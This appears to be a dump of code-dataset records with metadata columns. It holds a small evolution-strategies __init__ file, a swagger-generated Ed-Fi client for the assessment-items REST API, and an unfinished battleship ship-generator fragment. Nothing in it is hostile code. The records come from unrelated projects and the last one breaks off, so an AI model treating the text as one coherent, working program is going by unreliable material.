learnedevolution/targets/covariance/__init__.py
|
realtwister/LearnedEvolution
|
2ec49b50a49acae9693cfb05ac114dfbcc4aa337
|
[
"MIT"
] | null | null | null |
learnedevolution/targets/covariance/__init__.py
|
realtwister/LearnedEvolution
|
2ec49b50a49acae9693cfb05ac114dfbcc4aa337
|
[
"MIT"
] | null | null | null |
learnedevolution/targets/covariance/__init__.py
|
realtwister/LearnedEvolution
|
2ec49b50a49acae9693cfb05ac114dfbcc4aa337
|
[
"MIT"
] | null | null | null |
def covariance_classes():
from .cmaes_covariance import CMAESCovariance;
from .amalgam_covariance import AMaLGaMCovariance;
return locals();
| 30.6
| 54
| 0.777778
| 15
| 153
| 7.733333
| 0.733333
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 153
| 4
| 55
| 38.25
| 0.899225
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2c3eefa9920c64ef4f6ec1c906637bba19179ac5
| 42,349
|
py
|
Python
|
src/v5.3/resources/swagger_client/api/assessment_items_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 2
|
2021-04-27T17:18:17.000Z
|
2021-04-27T19:14:39.000Z
|
src/v5.3/resources/swagger_client/api/assessment_items_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | null | null | null |
src/v5.3/resources/swagger_client/api/assessment_items_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 1
|
2022-01-06T09:43:11.000Z
|
2022-01-06T09:43:11.000Z
|
# coding: utf-8
"""
Ed-Fi Operational Data Store API
The Ed-Fi ODS / API enables applications to read and write education data stored in an Ed-Fi ODS through a secure REST interface. *** > *Note: Consumers of ODS / API information should sanitize all data for display and storage. The ODS / API provides reasonable safeguards against cross-site scripting attacks and other malicious content, but the platform does not and cannot guarantee that the data it contains is free of all potentially harmful content.* *** # noqa: E501
OpenAPI spec version: 3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class AssessmentItemsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_assessment_item_by_id(self, id, **kwargs): # noqa: E501
"""Deletes an existing resource using the resource identifier. # noqa: E501
The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_assessment_item_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_assessment_item_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_assessment_item_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_assessment_item_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Deletes an existing resource using the resource identifier. # noqa: E501
The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_assessment_item_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'if_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_assessment_item_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_assessment_item_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_match' in params:
header_params['If-Match'] = params['if_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/assessmentItems/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def deletes_assessment_items(self, **kwargs): # noqa: E501
"""Retrieves deleted resources based on change version. # noqa: E501
The DELETES operation is used to retrieve deleted resources. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_assessment_items(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[DeletedResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deletes_assessment_items_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.deletes_assessment_items_with_http_info(**kwargs) # noqa: E501
return data
def deletes_assessment_items_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves deleted resources based on change version. # noqa: E501
The DELETES operation is used to retrieve deleted resources. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_assessment_items_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[DeletedResource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'snapshot_identifier'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method deletes_assessment_items" % key
)
params[key] = val
del params['kwargs']
if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `deletes_assessment_items`, must be a value less than or equal to `500`") # noqa: E501
if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `deletes_assessment_items`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'min_change_version' in params:
query_params.append(('minChangeVersion', params['min_change_version'])) # noqa: E501
if 'max_change_version' in params:
query_params.append(('maxChangeVersion', params['max_change_version'])) # noqa: E501
header_params = {}
if 'snapshot_identifier' in params:
header_params['Snapshot-Identifier'] = params['snapshot_identifier'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/assessmentItems/deletes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DeletedResource]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_assessment_items(self, **kwargs): # noqa: E501
"""Retrieves specific resources using the resource's property values (using the \"Get\" pattern). # noqa: E501
This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_assessment_items(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
:param str identification_code: A unique number or alphanumeric code assigned to a space, room, site, building, individual, organization, program, or institution by a school, school system, state, or other agency or entity.
:param str assessment_identifier: A unique number or alphanumeric code assigned to an assessment.
:param str namespace: Namespace for the Assessment.
:param str assessment_item_category_descriptor: Category or type of the AssessmentItem. For example: Multiple choice Analytic Prose ...
:param str assessment_item_uri: The URI (typical a URL) pointing to the entry in an assessment item bank, which describes this content item.
:param str correct_response: The correct response for the AssessmentItem.
:param str expected_time_assessed: The duration of time allotted for the AssessmentItem.
:param str id:
:param str item_text: The text of the item.
:param float max_raw_score: The maximum raw score achievable across all assessment items that are correct and scored at the maximum.
:param str nomenclature: Reflects the specific nomenclature used for AssessmentItem.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[EdFiAssessmentItem]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_assessment_items_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_assessment_items_with_http_info(**kwargs) # noqa: E501
return data
def get_assessment_items_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves specific resources using the resource's property values (using the \"Get\" pattern). # noqa: E501
This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_assessment_items_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
:param str identification_code: A unique number or alphanumeric code assigned to a space, room, site, building, individual, organization, program, or institution by a school, school system, state, or other agency or entity.
:param str assessment_identifier: A unique number or alphanumeric code assigned to an assessment.
:param str namespace: Namespace for the Assessment.
:param str assessment_item_category_descriptor: Category or type of the AssessmentItem. For example: Multiple choice Analytic Prose ...
:param str assessment_item_uri: The URI (typical a URL) pointing to the entry in an assessment item bank, which describes this content item.
:param str correct_response: The correct response for the AssessmentItem.
:param str expected_time_assessed: The duration of time allotted for the AssessmentItem.
:param str id:
:param str item_text: The text of the item.
:param float max_raw_score: The maximum raw score achievable across all assessment items that are correct and scored at the maximum.
:param str nomenclature: Reflects the specific nomenclature used for AssessmentItem.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: list[EdFiAssessmentItem]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'total_count', 'identification_code', 'assessment_identifier', 'namespace', 'assessment_item_category_descriptor', 'assessment_item_uri', 'correct_response', 'expected_time_assessed', 'id', 'item_text', 'max_raw_score', 'nomenclature', 'snapshot_identifier'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_assessment_items" % key
)
params[key] = val
del params['kwargs']
if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_assessment_items`, must be a value less than or equal to `500`") # noqa: E501
if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_assessment_items`, must be a value greater than or equal to `0`") # noqa: E501
if self.api_client.client_side_validation and ('identification_code' in params and
len(params['identification_code']) > 60):
raise ValueError("Invalid value for parameter `identification_code` when calling `get_assessment_items`, length must be less than or equal to `60`") # noqa: E501
if self.api_client.client_side_validation and ('assessment_identifier' in params and
len(params['assessment_identifier']) > 60):
raise ValueError("Invalid value for parameter `assessment_identifier` when calling `get_assessment_items`, length must be less than or equal to `60`") # noqa: E501
if self.api_client.client_side_validation and ('namespace' in params and
len(params['namespace']) > 255):
raise ValueError("Invalid value for parameter `namespace` when calling `get_assessment_items`, length must be less than or equal to `255`") # noqa: E501
if self.api_client.client_side_validation and ('assessment_item_category_descriptor' in params and
len(params['assessment_item_category_descriptor']) > 306):
raise ValueError("Invalid value for parameter `assessment_item_category_descriptor` when calling `get_assessment_items`, length must be less than or equal to `306`") # noqa: E501
if self.api_client.client_side_validation and ('assessment_item_uri' in params and
len(params['assessment_item_uri']) > 255):
raise ValueError("Invalid value for parameter `assessment_item_uri` when calling `get_assessment_items`, length must be less than or equal to `255`") # noqa: E501
if self.api_client.client_side_validation and ('correct_response' in params and
len(params['correct_response']) > 20):
raise ValueError("Invalid value for parameter `correct_response` when calling `get_assessment_items`, length must be less than or equal to `20`") # noqa: E501
if self.api_client.client_side_validation and ('expected_time_assessed' in params and
len(params['expected_time_assessed']) > 30):
raise ValueError("Invalid value for parameter `expected_time_assessed` when calling `get_assessment_items`, length must be less than or equal to `30`") # noqa: E501
if self.api_client.client_side_validation and ('item_text' in params and
len(params['item_text']) > 1024):
raise ValueError("Invalid value for parameter `item_text` when calling `get_assessment_items`, length must be less than or equal to `1024`") # noqa: E501
if self.api_client.client_side_validation and ('nomenclature' in params and
len(params['nomenclature']) > 35):
raise ValueError("Invalid value for parameter `nomenclature` when calling `get_assessment_items`, length must be less than or equal to `35`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'min_change_version' in params:
query_params.append(('minChangeVersion', params['min_change_version'])) # noqa: E501
if 'max_change_version' in params:
query_params.append(('maxChangeVersion', params['max_change_version'])) # noqa: E501
if 'total_count' in params:
query_params.append(('totalCount', params['total_count'])) # noqa: E501
if 'identification_code' in params:
query_params.append(('identificationCode', params['identification_code'])) # noqa: E501
if 'assessment_identifier' in params:
query_params.append(('assessmentIdentifier', params['assessment_identifier'])) # noqa: E501
if 'namespace' in params:
query_params.append(('namespace', params['namespace'])) # noqa: E501
if 'assessment_item_category_descriptor' in params:
query_params.append(('assessmentItemCategoryDescriptor', params['assessment_item_category_descriptor'])) # noqa: E501
if 'assessment_item_uri' in params:
query_params.append(('assessmentItemURI', params['assessment_item_uri'])) # noqa: E501
if 'correct_response' in params:
query_params.append(('correctResponse', params['correct_response'])) # noqa: E501
if 'expected_time_assessed' in params:
query_params.append(('expectedTimeAssessed', params['expected_time_assessed'])) # noqa: E501
if 'id' in params:
query_params.append(('id', params['id'])) # noqa: E501
if 'item_text' in params:
query_params.append(('itemText', params['item_text'])) # noqa: E501
if 'max_raw_score' in params:
query_params.append(('maxRawScore', params['max_raw_score'])) # noqa: E501
if 'nomenclature' in params:
query_params.append(('nomenclature', params['nomenclature'])) # noqa: E501
header_params = {}
if 'snapshot_identifier' in params:
header_params['Snapshot-Identifier'] = params['snapshot_identifier'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/assessmentItems', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[EdFiAssessmentItem]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_assessment_items_by_id(self, id, **kwargs): # noqa: E501
"""Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501
This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_assessment_items_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: EdFiAssessmentItem
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_assessment_items_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_assessment_items_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_assessment_items_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501
This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_assessment_items_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: EdFiAssessmentItem
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'if_none_match', 'snapshot_identifier'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_assessment_items_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_assessment_items_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_none_match' in params:
header_params['If-None-Match'] = params['if_none_match'] # noqa: E501
if 'snapshot_identifier' in params:
header_params['Snapshot-Identifier'] = params['snapshot_identifier'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/assessmentItems/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EdFiAssessmentItem', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_assessment_item(self, assessment_item, **kwargs): # noqa: E501
"""Creates or updates resources based on the natural key values of the supplied resource. # noqa: E501
The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error. The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. It is recommended to use POST for both create and update except while updating natural key of a resource in which case PUT operation must be used. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_assessment_item(assessment_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EdFiAssessmentItem assessment_item: The JSON representation of the \"assessmentItem\" resource to be created or updated. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_assessment_item_with_http_info(assessment_item, **kwargs) # noqa: E501
else:
(data) = self.post_assessment_item_with_http_info(assessment_item, **kwargs) # noqa: E501
return data
def post_assessment_item_with_http_info(self, assessment_item, **kwargs): # noqa: E501
"""Creates or updates resources based on the natural key values of the supplied resource. # noqa: E501
The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error. The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. It is recommended to use POST for both create and update except while updating natural key of a resource in which case PUT operation must be used. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_assessment_item_with_http_info(assessment_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EdFiAssessmentItem assessment_item: The JSON representation of the \"assessmentItem\" resource to be created or updated. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['assessment_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_assessment_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'assessment_item' is set
if self.api_client.client_side_validation and ('assessment_item' not in params or
params['assessment_item'] is None): # noqa: E501
raise ValueError("Missing the required parameter `assessment_item` when calling `post_assessment_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'assessment_item' in params:
body_params = params['assessment_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/assessmentItems', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def put_assessment_item(self, id, assessment_item, **kwargs): # noqa: E501
"""Updates a resource based on the resource identifier. # noqa: E501
The PUT operation is used to update a resource by identifier. If the resource identifier (\"id\") is provided in the JSON body, it will be ignored. Additionally, this API resource is not configured for cascading natural key updates. Natural key values for this resource cannot be changed using PUT operation and will not be modified in the database, and so recommendation is to use POST as that supports upsert behavior. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_assessment_item(id, assessment_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param EdFiAssessmentItem assessment_item: The JSON representation of the \"assessmentItem\" resource to be created or updated. (required)
:param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_assessment_item_with_http_info(id, assessment_item, **kwargs) # noqa: E501
else:
(data) = self.put_assessment_item_with_http_info(id, assessment_item, **kwargs) # noqa: E501
return data
def put_assessment_item_with_http_info(self, id, assessment_item, **kwargs): # noqa: E501
"""Updates a resource based on the resource identifier. # noqa: E501
The PUT operation is used to update a resource by identifier. If the resource identifier (\"id\") is provided in the JSON body, it will be ignored. Additionally, this API resource is not configured for cascading natural key updates. Natural key values for this resource cannot be changed using PUT operation and will not be modified in the database, and so recommendation is to use POST as that supports upsert behavior. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_assessment_item_with_http_info(id, assessment_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param EdFiAssessmentItem assessment_item: The JSON representation of the \"assessmentItem\" resource to be created or updated. (required)
:param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'assessment_item', 'if_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_assessment_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `put_assessment_item`") # noqa: E501
# verify the required parameter 'assessment_item' is set
if self.api_client.client_side_validation and ('assessment_item' not in params or
params['assessment_item'] is None): # noqa: E501
raise ValueError("Missing the required parameter `assessment_item` when calling `put_assessment_item`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_match' in params:
header_params['If-Match'] = params['if_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'assessment_item' in params:
body_params = params['assessment_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/assessmentItems/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 55.722368
| 578
| 0.65619
| 5,193
| 42,349
| 5.157327
| 0.073946
| 0.042118
| 0.018445
| 0.01613
| 0.925958
| 0.902584
| 0.888694
| 0.876298
| 0.866814
| 0.865581
| 0
| 0.01599
| 0.264564
| 42,349
| 759
| 579
| 55.795784
| 0.843924
| 0.4172
| 0
| 0.708434
| 0
| 0.031325
| 0.268422
| 0.07853
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031325
| false
| 0
| 0.009639
| 0
| 0.086747
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cae1f4f412cb6799873638b2cc8b50a30171df8
| 4,113
|
py
|
Python
|
ship_gen.py
|
the-bald-lad/Battle-Ships
|
8c5a2377934ceb3a55fcf06aec0f8512b5954234
|
[
"MIT"
] | 1
|
2021-12-16T17:27:14.000Z
|
2021-12-16T17:27:14.000Z
|
ship_gen.py
|
the-bald-lad/Battle-Ships
|
8c5a2377934ceb3a55fcf06aec0f8512b5954234
|
[
"MIT"
] | null | null | null |
ship_gen.py
|
the-bald-lad/Battle-Ships
|
8c5a2377934ceb3a55fcf06aec0f8512b5954234
|
[
"MIT"
] | null | null | null |
import csv
import random
# 1x2, 2x3, 1x4, 1x5
row_num = col_num = 10
map_list = [[0 for i in range(row_num)] for i in range(col_num)]
def aaaaa():
return map_list
def boat2(map_list):
a = random.randint(1, 2)
